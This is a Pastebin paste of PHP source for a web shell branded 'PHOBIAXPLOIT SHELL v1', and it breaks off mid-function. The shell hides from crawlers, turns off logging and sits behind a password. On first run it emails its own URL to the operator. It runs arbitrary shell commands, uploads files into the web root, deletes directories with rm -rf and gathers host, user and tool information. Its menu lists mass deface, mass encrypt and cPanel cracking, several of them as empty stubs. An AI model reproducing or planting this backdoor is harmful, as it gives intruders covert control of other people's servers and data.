Guest User

Coming Soon Kontol

a guest
Dec 16th, 2018
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.02 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. set_magic_quotes_runtime(0);
  6. clearstatcache();
  7. ini_set('error_log', NULL);
  8. ini_set('log_errors', 0);
  9. ini_set('max_execution_time', 0);
  10. ini_set('output_buffering', 0);
  11. ini_set('display_errors', 0);
  12.  
  13. $password = "b7d6b1fdee9c53cb1d7fd096921db1a6"; // default: phobiaxploit
  14.  
  15. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  16. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  17. if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  18. header('HTTP/1.0 404 Not Found');
  19. exit;
  20. }
  21. }
  22.  
  23. function login() {
  24. ?>
  25. <!--
  26. ##################################################
  27. PHOBIAXPLOIT SHELL VERSION 1.0
  28. THANKS YANG UDAH BANTU SELAMA PEMBUATAN SHELL INI
  29. TANPA KALIAN MUNGKIN SHELL INI GAK BAKAL JADI
  30. ##################################################
  31. -->
  32. <!DOCTYPE html>
  33. <html lang="en">
  34. <head>
  35. <meta charset="UTF-8">
  36. <meta name='author' content='PhobiaXploit'>
  37. <meta charset="UTF-8">
  38. <title>PHOBIAXPLOIT SHELL v.1</title>
  39. <link href="http://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css"/>
  40. <style type="text/css">
  41. * {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.png), auto !important;}
  42. html {
  43. margin: 20px auto;
  44. background: #000000;
  45. color: red;
  46. text-align: center;
  47. }
  48. header {
  49. color: #2F4F4F;
  50. margin: 10px auto;
  51. }
  52. input[type=password] {
  53. color: red;
  54. background: transparent;
  55. border: 1px solid white;
  56. border-top: 2px solid red;
  57. text-align: center;
  58. box-shadow: 1px 1px 0px red;
  59. }
  60. input[type=password]:hover {
  61. color: red
  62. background: transparent;
  63. border: 1px solid white;
  64. border-top: 2px solid red;
  65. text-align: center;
  66. box-shadow: 1px 1px 0px red;
  67. }
  68. </style>
  69.  
  70. </head>
  71. <body>
  72. <br><br><br>
  73. <span style='color: rgb(127, 127, 126);'><br> <span style='font-family: monospace;'> <center><style type="text/css">body { font-family: 'Amatic SC'; color: white; padding: 0; margin: 0; background-image: url(''); background-repeat:no-repeat; background-position:center; background-size: 100% 100%; } { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } img { opacity: 0.8; } img { animation-name: rotate ; animation-duration: 7s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0; filter: alpha(opacity=50); } img:hover { opacity: 1.0;filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style><img style="width: 200px;" src='https://3.bp.blogspot.com/-y7Z74tfxNQE/W7eaJH-VEnI/AAAAAAAAATg/3BFlnuFOuPUF0_iS28bZCN-LJYER7jzBgCLcBGAs/s320/36c743d5-810c-4aa4-8a29-e00b50d55ecb.jpg'>
  74. <hr size="3" color="red"> <center><font face="CONSOLAS" size="8" color="red">PHOBIA<font face="CONSOLAS" size="8" color="white">XPLOIT</font></font></center>
  75. <center><font color="white" size="5" face="tahoma"><b>Look For Something That Is Impossible</b></font></center>
  76. <p></p>
  77. <form method="POST">
  78. <input type="password" name="pass">
  79. </form>
  80. <br>
  81. <hr size="3" color="red">
  82.  
  83. </body>
  84. </html>
  85. <?php
  86. exit;
  87. }
  88.  
  89. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  90. if (empty($password) || (isset($_POST['pass']) && (md5($_POST['pass']) == $password))) {
  91. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  92. } else {
  93. login();
  94. }
  95. }
  96.  
  97. if (file_exists('.db'))
  98. { } else {
  99. $subject = $_SERVER['SERVER_NAME'];
  100. $header = "From: Mastah <[email protected]>";
  101. $header .= "MIME-Version: 1.0\r\n";
  102. $header .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  103. $message = "<font face='tahoma' color='red' size='8'>Akses Shell : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "</font>";
  104. mail($to, $subject, $message, $header);
  105. $m = fopen(".db", "w") or die (" ");
  106. $txt = "";
  107. fwrite($m, $txt);
  108. fclose($m);
  109. chmod(".db",0644); }
  110.  
  111. ?>
  112.  
  113. <!doctype html>
  114. <html lang="en">
  115.  
  116. <head>
  117.  
  118. <!-- Required meta tags -->
  119. <meta charset="utf-8">
  120. <meta name="viewport" content="width=device-width, initial-scale=1">
  121.  
  122. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
  123. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  124. <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
  125. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  126.  
  127. <title>PHOBIAXPLOIT SHELL</title>
  128. <style type="text/css">
  129. * {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.png), auto !important;}
  130. body {
  131. background: url("https://dwijatmiko.files.wordpress.com/2010/08/wallpaper_13941.jpg") no-repeat center center fixed;
  132. -webkit-background-size: cover;
  133. -moz-background-size: cover;
  134. background-size: cover;
  135. -o-background-size: cover;
  136. }
  137. hr {
  138. border-top: 3px solid red !important;
  139. }
  140.  
  141. .a-gaya {
  142. padding: 2px 10px !important;
  143. margin: 0 !important;
  144. background: black !important;
  145. text-decoration: none !important;
  146. letter-spacing: 2px !important;
  147. padding: 2px 10px !important;
  148. margin: 0 !important;
  149. background: black !important;
  150. text-decoration: none !important;
  151. letter-spacing: 2px !important;
  152. border-radius: 2px !important;
  153. border-top: 2px solid darkred !important;
  154. border-bottom: 2px solid darkred !important;
  155. border-right: 2px solid red !important;
  156. border-left: 2px solid red !important;
  157. font-family: CONSOLAS !important;
  158. }
  159.  
  160. .a-gaya:hover {
  161. background: #180000 !important;
  162. border-right: 0px solid #333333 !important;
  163. border-left: 0px solid #333333 !important;
  164. }
  165.  
  166. .footer {
  167. position: fixed;
  168. left: 0;
  169. bottom: 0;
  170. width: 100%;
  171. background-color: darkred;
  172. color: white;
  173. text-align: center;
  174. }
  175.  
  176. .btn {
  177. margin-top: 10px !important;
  178. }
  179. .card {
  180. border: none;
  181. }
  182. .linkdir {
  183. color: #fff;
  184.  
  185. }
  186. .linkdir:hover {
  187. color: #fff;
  188.  
  189. }
  190. .text-merah {
  191. color: red;
  192. }
  193. .aksi-table:hover {
  194. background-color: #8b0000;
  195. }
  196. .btn-redark {
  197. color: #fff;
  198. background-color: #8b0000;
  199. border-color: #8b0000;
  200.  
  201. }
  202. body::-webkit-scrollbar {
  203. width: 1em;
  204. }
  205.  
  206. body::-webkit-scrollbar-track {
  207. -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
  208. }
  209.  
  210. body::-webkit-scrollbar-thumb {
  211. background-color: #8b0000;
  212. outline: 1px solid slategrey;
  213. }
  214. </style>
  215. </head>
  216.  
  217. <body>
  218.  
  219. <h1 class="text-white text-center">PHOBIA<font color="red" size="10"><b>X</b></font>PLOIT</h1>
  220. <h5 class="text-merah text-center">Look For Something That Is Impossible</h5>
  221. <hr />
  222. <?php
  223. if (isset($_GET['dir'])) {
  224. $dir = $_GET['dir'];
  225. chdir($dir);
  226. } else {
  227. $dir = getcwd();
  228. }
  229. $kernel = php_uname();
  230. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  231. $dir = str_replace("\\", "/", $dir);
  232. $scdir = explode("/", $dir);
  233. $freespace = hdd(disk_free_space("/"));
  234. $total = hdd(disk_total_space("/"));
  235. $used = $total - $freespace;
  236. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  237. $ds = @ini_get("disable_functions");
  238. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  239. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  240. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  241. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  242. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  243. $show_ds = (!empty($ds)) ? "<font color=white>$ds</font>" : "<font color=lime>NONE</font>";
  244. if (!function_exists('posix_getegid')) {
  245. $user = @get_current_user();
  246. $uid = @getmyuid();
  247. $gid = @getmygid();
  248. $group = "?";
  249. } else {
  250. $uid = @posix_getpwuid(posix_geteuid());
  251. $gid = @posix_getgrgid(posix_getegid());
  252. $user = $uid['name'];
  253. $uid = $uid['uid'];
  254. $group = $gid['name'];
  255. $gid = $gid['gid'];
  256. }
  257. echo "<center><font color='white' face='tahoma'>";
  258. echo "<font face='CONSOLAS' size='3'>";
  259. echo "<td>System: <font color=lime>" . $kernel . "</font><br>";
  260. echo "User: <font color=lime>" . $user . "</font> (" . $uid . ") Group: <font color=lime>" . $group . "</font> (" . $gid . ")<br>";
  261. echo "Server IP: <font color=lime>" . $ip . "</font> | Your IP: <font color=lime>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
  262. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  263. echo "Safe Mode: $sm<br>";
  264. echo "Disable Functions: $show_ds<br>";
  265. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br></td><td></td><td></td>";
  266. echo "<hr>";
  267. echo '
  268.  
  269. <center>
  270. <a class="btn text-white a-gaya" href="?home" role="button">Home</a>
  271. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Command</a>
  272. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=upload" role="button">Upload</a>
  273. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Deface</a>
  274. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Delete</a>
  275. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Encrypt</a>
  276. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=adminer" role="button">Adminer</a>
  277. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Config</a>
  278. <a class="btn text-white a-gaya" rhref="?dir=' . $dir . '&" role="button">Symlink</a>
  279. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Jumping</a>
  280. <p></p>
  281. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Fake Root</a>
  282. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Cpanel Crack</a>
  283. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Script Encode</a>
  284. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Password Hash</a>
  285. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Patebin</a>
  286. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=info_server" role="button">Info Server</a>
  287. <a class="btn text-white a-gaya" href="?logout=true" role="button">Logout</a>
  288. </center>
  289. <hr>
  290.  
  291. ';
  292.  
  293. if (get_magic_quotes_gpc()) {
  294.  
  295. function idx_ss($array) {
  296. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  297. }
  298.  
  299. $_POST = idx_ss($_POST);
  300. $_COOKIE = idx_ss($_COOKIE);
  301. }
  302.  
  303. if (isset($_GET['dir'])) {
  304. $dir = $_GET['dir'];
  305. chdir($dir);
  306. } else {
  307. $dir = getcwd();
  308. }
  309.  
  310. $dir = str_replace("\\", "/", $dir);
  311. $scdir = explode("/", $dir);
  312.  
  313.  
  314. echo "<center>";
  315. echo "<font color=white>Current DIR: ";
  316. foreach ($scdir as $c_dir => $cdir) {
  317. echo "<a class='linkdir' href='?dir=";
  318. for ($i = 0; $i <= $c_dir; $i++) {
  319. echo $scdir[$i];
  320. if ($i != $c_dir) {
  321. echo "/";
  322. }
  323. }
  324. echo "'>$cdir</a>/";
  325. }
  326. echo "&nbsp;&nbsp;[ " . w($dir, perms($dir)) . " ] <br><br>";
  327. echo "</font></center>";
  328.  
  329.  
  330. // table action
  331.  
  332. if($_GET["px"] == "newfile")
  333. {
  334. if($_POST['new_save_file']) {
  335. $newfile = htmlspecialchars($_POST['newfile']);
  336. $fopen = fopen($newfile, "a+");
  337. if($fopen) {
  338. $act = "<script>window.location='?px=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  339. } else {
  340. $act = "<font color=red>permission denied</font>";
  341. }
  342. }
  343. echo $act;
  344. echo "
  345. <div class='container'>
  346. <div class='row'>
  347. <div class='col-md-2'></div>
  348. <div class='col-md-7'>
  349. <form class='form-inline' method='post'>
  350. <div class='form-group '>
  351. <label for='file'>File name:</label>
  352. <input class='form-control' type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' id='file'>
  353. </div>
  354. <input class='btn btn-redark' type='submit' name='new_save_file' value='Submit' style='margin-bottom: 10px; margin-left:10px;'>
  355. </form>
  356. </div>
  357. </div>
  358. </div>
  359. ";
  360.  
  361. }
  362. elseif($_GET['px'] == 'delete_dir') {
  363. if(is_dir($dir)) {
  364. if(is_writable($dir)) {
  365. @rmdir($dir);
  366. @exe("rm -rf $dir");
  367. @exe("rmdir /s /q $dir");
  368. $px = "<script>window.location='?dir=".dirname($dir)."';</script>";
  369. } else {
  370. $px = "<font color=red>could not remove ".basename($dir)."</font>";
  371. }
  372. }
  373. echo $px;
  374. } elseif($_GET["action"] == "command") //action table
  375. {
  376.  
  377. } elseif ($_GET["action"] == "upload") {
  378. echo "<center>";
  379. if($_POST['upload']) {
  380. if($_POST['tipe_upload'] == 'biasa') {
  381. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  382. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  383. } else {
  384. $act = "<font color=red>failed to upload file</font>";
  385. }
  386. } else {
  387. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  388. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  389. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  390. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  391. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  392. } else {
  393. $act = "<font color=red>failed to upload file</font>";
  394. }
  395. } else {
  396. $act = "<font color=red>failed to upload file</font>";
  397. }
  398. }
  399. }
  400. echo "Upload File:
  401. <form method='post' enctype='multipart/form-data'>
  402. <input type='radio' name='tipe_upload' value='biasa' checked />Biasa [ ".w($dir,"Writeable")." ]
  403. <input type='radio' name='tipe_upload' value='home_root' />home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br><br>
  404. <input class='btn btn-redark' type='file' name='ix_file'><br>
  405. <input class='btn btn-redark' type='submit' value='upload' name='upload'>
  406. </form>";
  407. echo $act;
  408. echo "</center>";
  409. } elseif ($_GET["action"] == "mass_deface") {
  410. # code...
  411. } elseif ($_GET["action"] == "mass_delete") {
  412. # code...
  413. } elseif ($_GET["action"] == "mass_encrypt") {
  414. # code...
  415. } elseif ($_GET["action"] == "adminer") {
  416. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  417. if (file_exists('adminer.php')) {
  418. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  419. } else {
  420. if (adminer("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php")) {
  421. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  422. } else {
  423. echo "<center><font color=red>gagal buat file adminer</font></center>";
  424. }
  425. }
  426. } elseif ($_GET["action"] == "config") {
  427. # code...
  428. } elseif ($_GET["action"] == "symlink") {
  429. # code...
  430. } elseif ($_GET["action"] == "jumping") {
  431. # code...
  432. } elseif ($_GET["action"] == "fake root") {
  433. # code...
  434. } elseif ($_GET["action"] == "cpanel crack") {
  435. # code...
  436. } elseif ($_GET["action"] == "script encode") {
  437. # code...
  438. } elseif ($_GET["action"] == "password hash") {
  439. # code...
  440. } elseif ($_GET["action"] == "info_server") {
  441. echo "<div id=result style='color:lime;'>
  442. <h2>Info Server</h2> <br /><br />
  443. <br> OS: <a style='color:lime;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  444. <br> PHP Version : <a style='color:lime;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  445. <br> Kernel Release : <font color=lime>".php_uname(r)."</font>
  446. <br> Kernel Version : <font color=lime>".php_uname(v)."</font>
  447. <br>Machine : <font color=lime>".php_uname(m)."</font>
  448. <br>Server Software : <font color=lime>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
  449. if(function_exists('apache_get_modules'))
  450. {
  451. echo "Loaded Apache modules : <br /><br /><font color=>lime";
  452. echo implode(', ', apache_get_modules());
  453. echo "</font></tr></td>";
  454. }
  455. if($os=='win')
  456. {
  457. echo "Account Setting : <font color=lime><pre>".cmd('net accounts')."</pre>
  458. User Accounts : <font color=lime><pre>".cmd('net user')."</pre>
  459. ";
  460. }
  461. if($os=='nix')
  462. {
  463. echo "Distro : <font color=lime><pre>".cmd('cat /etc/*-release')."</pre></font>
  464. Distr name : <font color=lime><pre>".cmd('cat /etc/issue.net')."</pre></font>
  465. GCC : <font color=lime><pre>".cmd('whereis gcc')."</pre>
  466. PERL : <font color=lime><pre>".cmd('whereis perl')."</pre>
  467. PYTHON : <font color=lime><pre>".cmd('whereis python')."</pre>
  468. JAVA : <font color=lime><pre>".cmd('whereis java')."</pre></td></tr>
  469. APACHE : <font color=lime><pre>".cmd('whereis apache')."</pre></td></tr>
  470. CPU : <br /><br /><pre><font color=lime>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  471. RAM : <font color=lime><pre>".cmd('free -m')."</pre></td></tr>
  472. User Limits : <br /><br /><font color=lime><pre>".cmd('ulimit -a')."</pre></td></tr>";
  473. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  474. $uze=array();
  475. foreach($useful as $uzeful)
  476. {
  477. if(cmd("which $uzeful"))
  478. {
  479. $uze[]=$uzeful;
  480. }
  481. }
  482. echo " Useful : <br /><font color=lime><pre>";
  483. echo implode(', ',$uze);
  484. echo "</pre></td></tr>";
  485. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  486. $uze=array();
  487. foreach($downloaders as $downloader)
  488. {
  489. if(cmd("which $downloader"))
  490. {
  491. $uze[]=$downloader;
  492. }
  493. }
  494. echo " Downloaders : <br /><font color=lime><pre>";
  495. echo implode(', ',$uze);
  496. echo "</pre></td></tr>";
  497. echo " Users : <br /><font color=lime><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  498. Hosts : <br /><font color=lime><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  499. }
  500. echo " <br /><br /> <br /><br />";
  501. }
  502. elseif ($_GET['logout'] == true) {
  503. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  504. echo "<script>window.location='?';</script>";
  505. } else {
  506. if (is_dir($dir)) {
  507. if (!is_readable($dir)) {
  508. echo "<font color=red>can't open directory. ( not readable )</font>";
  509. } else {
  510.  
  511. echo "<div class='table-responsive'>
  512. <table class='table table-bordered'>
  513. <thead>
  514. <tr class='aksi-table'>
  515. <th class='text-center text-merah'>Name</th>
  516. <th class='text-center text-merah'>Type</th>
  517. <th class='text-center text-merah'>Size</th>
  518. <th class='text-center text-merah'>Last</th>
  519. <th class='text-center text-merah'>Owner/Grup</th>
  520. <th class='text-center text-merah'>Permission</th>
  521. <th class='text-center text-merah'>action</th>
  522.  
  523. </tr>
  524. </thead>";
  525. $scandir = scandir($dir);
  526. foreach ($scandir as $dirx) {
  527. $dtype = filetype("$dir/$dirx");
  528. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  529. if (function_exists('posix_getpwuid')) {
  530. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  531. $downer = $downer['name'];
  532. } else {
  533. //$downer = $uid;
  534. $downer = fileowner("$dir/$dirx");
  535. }
  536. if (function_exists('posix_getgrgid')) {
  537. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  538. $dgrp = $dgrp['name'];
  539. } else {
  540. $dgrp = filegroup("$dir/$dirx");
  541. }
  542. if (is_file("$dir/$dirx")) {
  543. continue;
  544. }
  545. if ($dirx === '..') {
  546. $href = "<a href='?dir=" . dirname($dir) . "' class='linkdir'>$dirx</a>";
  547. } elseif ($dirx === '.') {
  548. $href = "<a href='?dir=' . $dir . '' class='linkdir'>$dirx</a>";
  549. } else {
  550. $href = "<a href='?dir=' . $dir . '/$dirx' class='linkdir'>$dirx</a>";
  551. }
  552. if ($dirx === '.' || $dirx === '..') {
  553. $act_dir = "<a href='?px=newfile&dir=$dir' class='linkdir'>newfile</a> | <a href='?px=newfolder&dir=$dir' class='linkdir'>newfolder</a>";
  554. } else {
  555. $act_dir = "<a href='?px=rename_dir&dir=$dir/$dirx' class='linkdir'>rename</a> | <a href='?px=delete_dir&dir=$dir/$dirx' class='linkdir'>delete</a>";
  556. }
  557. echo "<tbody><tr class='aksi-table'>";
  558. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA" . "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp" . "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  559. echo "<td><center><font color=white>$dtype</font></center></td>";
  560. echo "<td><center><font color=white>-</font></center></th></td>";
  561. echo "<td><center><font color=white>$dtime</font></center></td>";
  562. echo "<td><center><font color=white>$downer/$dgrp</font></center></td>";
  563. echo "<td><center><font color=white>" . w("$dir/$dirx", perms("$dir/$dirx")) . "</font></center></td>";
  564. echo "<td style='padding-left: 15px;'><font color=white>$act_dir</font></td>";
  565. echo "</tr></tbody>";
  566. }
  567. }
  568. } else {
  569. echo "<font color=red>can't open directory.</font>";
  570. }
  571. foreach ($scandir as $file) {
  572. $ftype = filetype("$dir/$file");
  573. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  574. $size = filesize("$dir/$file") / 1024;
  575. $size = round($size, 3);
  576. if (function_exists('posix_getpwuid')) {
  577. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  578. $fowner = $fowner['name'];
  579. } else {
  580. //$downer = $uid;
  581. $fowner = fileowner("$dir/$file");
  582. }
  583. if (function_exists('posix_getgrgid')) {
  584. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  585. $fgrp = $fgrp['name'];
  586. } else {
  587. $fgrp = filegroup("$dir/$file");
  588. }
  589. if ($size > 1024) {
  590. $size = round($size / 1024, 2) . 'MB';
  591. } else {
  592. $size = $size . 'KB';
  593. }
  594. if (is_dir("$dir/$file")) {
  595. continue;
  596. }
  597.  
  598. echo "<tbody><tr class='aksi-table'>";
  599. echo "<td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?px=view&dir=$dir&file=$dir/$file' class='linkdir'>$file</a></td>";
  600. echo "<td><center><font color=white>$ftype</font></center></td>";
  601. echo "<td><center><font color=white>$size</font></center></td>";
  602. echo "<td><center><font color=white>$ftime</font></center></td>";
  603. echo "<td><center><font color=white>$fowner/$fgrp</font></center></td>";
  604. echo "<td><center><font color=white>" . w("$dir/$file", perms("$dir/$file")) . "</font></center></td>";
  605. echo "<td style='padding-left: 15px;'><a href='?px=edit&dir=$dir&file=$dir/$file' class='linkdir'>edit</a> | <a href='?px=rename&dir=$dir&file=$dir/$file' class='linkdir'>rename</a> | <a href='?px=delete_dir&dir=$dir&file=$dir/$file' class='linkdir'>delete</a> | <a href='?px=download&dir=$dir&file=$dir/$file' class='linkdir'>download</a></td>";
  606. echo "</tr></tbody>";
  607. }
  608. echo "</table></div>";
  609. }
  610. ?>
  611. <br>
  612. <br>
  613. <br>
  614. <footer class="footer">
  615. <div class="container">
  616. <span class="text-white">Copyright &copy; 2018 - PhobiaXploit</a></span>
  617. </div>
  618. </footer>
  619. </body>
  620.  
  621. </html>
  622. <?php
  623.  
  624. function hdd($s) {
  625. if ($s >= 1073741824) {
  626. return sprintf('%1.2f', $s / 1073741824) . ' GB';
  627. } elseif ($s >= 1048576) {
  628. return sprintf('%1.2f', $s / 1048576) . ' MB';
  629. } elseif ($s >= 1024) {
  630. return sprintf('%1.2f', $s / 1024) . ' KB';
  631. } else {
  632. return $s . ' B';
  633. }
  634. }
  635.  
  636. function exe($cmd) {
  637. if (function_exists('system')) {
  638. @ob_start();
  639. @system($cmd);
  640. $buff = @ob_get_contents();
  641. @ob_end_clean();
  642. return $buff;
  643. } elseif (function_exists('exec')) {
  644. @exec($cmd, $results);
  645. $buff = "";
  646. foreach ($results as $result) {
  647. $buff .= $result;
  648. } return $buff;
  649. } elseif (function_exists('passthru')) {
  650. @ob_start();
  651. @passthru($cmd);
  652. $buff = @ob_get_contents();
  653. @ob_end_clean();
  654. return $buff;
  655. } elseif (function_exists('shell_exec')) {
  656. $buff = @shell_exec($cmd);
  657. return $buff;
  658. }
  659. }
  660.  
  661. function perms($file) {
  662. $perms = fileperms($file);
  663. if (($perms & 0xC000) == 0xC000) {
  664. // Socket
  665. $info = 's';
  666. } elseif (($perms & 0xA000) == 0xA000) {
  667. // Symbolic Link
  668. $info = 'l';
  669. } elseif (($perms & 0x8000) == 0x8000) {
  670. // Regular
  671. $info = '-';
  672. } elseif (($perms & 0x6000) == 0x6000) {
  673. // Block special
  674. $info = 'b';
  675. } elseif (($perms & 0x4000) == 0x4000) {
  676. // Directory
  677. $info = 'd';
  678. } elseif (($perms & 0x2000) == 0x2000) {
  679. // Character special
  680. $info = 'c';
  681. } elseif (($perms & 0x1000) == 0x1000) {
  682. // FIFO pipe
  683. $info = 'p';
  684. } else {
  685. // Unknown
  686. $info = 'u';
  687. }
  688. // Owner
  689. $info .= (($perms & 0x0100) ? 'r' : '-');
  690. $info .= (($perms & 0x0080) ? 'w' : '-');
  691. $info .= (($perms & 0x0040) ?
  692. (($perms & 0x0800) ? 's' : 'x' ) :
  693. (($perms & 0x0800) ? 'S' : '-'));
  694. // Group
  695. $info .= (($perms & 0x0020) ? 'r' : '-');
  696. $info .= (($perms & 0x0010) ? 'w' : '-');
  697. $info .= (($perms & 0x0008) ?
  698. (($perms & 0x0400) ? 's' : 'x' ) :
  699. (($perms & 0x0400) ? 'S' : '-'));
  700. // World
